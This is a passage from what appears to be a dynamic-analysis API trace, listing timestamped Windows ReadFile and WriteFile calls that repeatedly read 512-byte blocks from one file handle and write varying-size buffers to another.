lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.025] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.025] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.026] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.026] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.027] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.027] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.028] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.028] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.029] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.029] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x338, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.030] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.030] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.030] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.031] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.031] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.032] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.033] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.034] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x329, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.034] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.036] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.037] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.038] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.039] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x385, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.039] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.040] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.040] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.041] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.042] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.043] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.043] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.044] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.045] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.046] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.047] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.048] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.049] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.049] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.051] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.052] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.052] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.053] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x332, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.054] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.055] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.055] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.056] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.058] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.059] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.060] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.062] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.065] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.066] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.067] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.067] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.068] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.068] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.069] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.069] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x243, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.069] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.070] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.070] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.071] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.071] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.072] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.072] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, 